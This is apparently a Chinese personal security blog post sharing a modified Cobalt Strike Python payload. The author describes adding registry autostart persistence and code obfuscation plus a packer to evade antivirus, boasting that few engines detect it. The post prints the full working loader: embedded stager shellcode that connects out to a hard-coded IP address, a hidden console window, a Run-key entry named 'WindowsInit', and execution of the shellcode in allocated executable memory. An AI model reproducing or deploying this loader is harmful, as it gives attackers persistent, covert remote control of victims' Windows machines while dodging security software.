酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

渗透测试神器Cobalt Strike的pyinstaller生成的payload带注册表起到版(混淆编码)

2020-2-19 15:10 作者:酷帥王子 | python网络安全 |

自己把程序改了一下,原始的cs payload没有注册表启动,现在改成注册表启动并且加入混淆编码,貌似windows的def反间谍软件会提示,没关系加个vm正版壳搞掂,免杀过全世界杀毒大部分,只有4个杀毒查杀或提示

from ctypes import *#line:1
import win32con #line:2
import win32api #line:3
import ctypes #line:4
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x45\x6d\x44\x00\x23\x36\x33\x30\xce\x43\x16\xd3\x55\xdb\xb7\x4b\x66\xdb\x56\x2f\x6d\x2e\xf9\x7e\xf9\xa9\x51\x24\x36\x49\x55\xf2\x47\x38\x70\xdd\x8b\x36\x58\x13\x9b\x4e\xba\x61\x53\xcc\x5c\xe5\x78\x88\x67\xb8\x26\x8e\x20\x42\x7a\x7b\x0f\x9f\x04\x2e\x86\x54\x9d\x2f\x8f\x43\x1f\x0f\x92\x0f\x8a\x31\xb3\x61\x96\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4e\x50\x30\x36\x29\x0d\x0a\x00\x58\xbf\x3e\x3b\x89\x1e\x30\xa9\x17\x84\x5c\xf9\x85\xb5\x86\x94\x46\xbe\xc0\x3c\x15\xe8\x4b\xf7\x97\x57\x30\x7e\xb2\x91\x4a\x05\xc0\xd3\x1a\x19\x49\xb5\x71\xcf\x12\x32\xac\x54\x31\xec\x88\x26\xf1\xb3\xf3\x7a\x6f\x98\x52\xdf\x6c\x04\x91\x89\x6c\x8c\x74\xd6\x0e\x56\x4d\x3b\x3f\xb6\x1f\x23\xdc\x8f\x58\x52\x26\x08\x82\x91\x98\xf9\x33\x0e\xfb\x76\xa9\xd4\x36\xab\xdb\xe1\xaa\x79\xe6\x06\xc2\x4b\x10\x4f\x34\xe7\xb9\x94\xdb\xbf\x9d\xe1\xcb\xea\x0a\xbc\x7a\x65\x69\x8f\x6f\x69\xe7\x92\xfb\x1a\x1c\x42\x07\xbf\x7d\x7f\xd8\x03\x8b\x57\xd4\xeb\xaf\x71\xc2\x48\x47\x75\x6d\xe9\x8a\xe1\x42\xeb\x61\x05\xdf\x8e\x4c\x50\x07\xad\x65\x7c\x7c\x51\x1c\x59\x36\x1c\x2f\x0c\x64\x41\x44\xed\x65\x5a\xa2\x99\x1a\x96\xe5\xfa\xdd\x7e\x1f\x1e\x33\x6b\x90\xbb\x69\x11\x5a\x58\xc9\xd2\xc6\x1c\x89\xfa\x2b\x54\xed\xf9\xe2\x5b\x15\xc6\x2c\x6d\x04\x26\x8a\x28\xf4\xe3\x86\x24\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x33\x34\x2e\x31\x37\x35\x2e\x31\x30\x31\x2e\x37\x35\x00\x6f\xaa\x51\xc3"
PROT_READ =1 #line:8
PROT_WRITE =2 #line:9
PROT_EXEC =4 #line:10
def addfile2autorun (O0O00OO0O0O00O0O0 ):#line:11
     ""#line:12
     O0O0O00OOOOOOOO00 ="Software\Microsoft\Windows\CurrentVersion\Run"#line:13
     O0O00O0OO000OOO00 =win32api .RegOpenKeyEx (win32con .HKEY_CURRENT_USER ,O0O0O00OOOOOOOO00 ,0 ,win32con .KEY_SET_VALUE )#line:14
     (OOO00OO00O0O0OOOO ,O000O000O0O00OOO0 )=os .path .split (O0O00OO0O0O00O0O0 )#line:15
     win32api .RegSetValueEx (O0O00O0OO000OOO00 ,"WindowsInit",0 ,win32con .REG_SZ ,O0O00OO0O0O00O0O0 )#line:16
     win32api .RegCloseKey (O0O00O0OO000OOO00 )#line:17
addfile2autorun (sys .argv [0 ])#line:19
def executable_code (O00000OO00OO000OO ):#line:21
    OOOO00OOOOO0OO00O =c_char_p (O00000OO00OO000OO )#line:22
    OOO0000OOOOO0O00O =len (O00000OO00OO000OO )#line:23
    OOOOO0O00OO000000 =libc .valloc (OOO0000OOOOO0O00O )#line:24
    OOOOO0O00OO000000 =c_void_p (OOOOO0O00OO000000 )#line:25
    if 0 ==OOOOO0O00OO000000 :#line:26
        raise Exception ("Failed to allocate memory")#line:27
    memmove (OOOOO0O00OO000000 ,OOOO00OOOOO0OO00O ,OOO0000OOOOO0O00O )#line:28
    if 0 !=libc .mprotect (OOOOO0O00OO000000 ,len (O00000OO00OO000OO ),PROT_READ |PROT_WRITE |PROT_EXEC ):#line:29
        raise Exception ("Failed to set protection on buffer")#line:30
    return OOOOO0O00OO000000 #line:31
VirtualAlloc =ctypes .windll .kernel32 .VirtualAlloc #line:32
VirtualProtect =ctypes .windll .kernel32 .VirtualProtect #line:33
shellcode =bytearray (buf )#line:34
whnd =ctypes .windll .kernel32 .GetConsoleWindow ()#line:35
if whnd !=0 :#line:36
    if 666 ==666 :#line:37
        ctypes .windll .user32 .ShowWindow (whnd ,0 )#line:38
        ctypes .windll .kernel32 .CloseHandle (whnd )#line:39
memorywithshell =ctypes .windll .kernel32 .VirtualAlloc (ctypes .c_int (0 ),ctypes .c_int (len (shellcode )),ctypes .c_int (0x3000 ),ctypes .c_int (0x40 ))#line:44
buf =(ctypes .c_char *len (shellcode )).from_buffer (shellcode )#line:45
old =ctypes .c_long (1 )#line:46
VirtualProtect (memorywithshell ,ctypes .c_int (len (shellcode )),0x40 ,ctypes .byref (old ))#line:47
ctypes .windll .kernel32 .RtlMoveMemory (ctypes .c_int (memorywithshell ),buf ,ctypes .c_int (len (shellcode )))#line:50
shell =cast (memorywithshell ,CFUNCTYPE (c_void_p ))#line:51
shell ()#line:53

大不如前了,以前上传的时候只有4个杀毒杀

文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-139.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.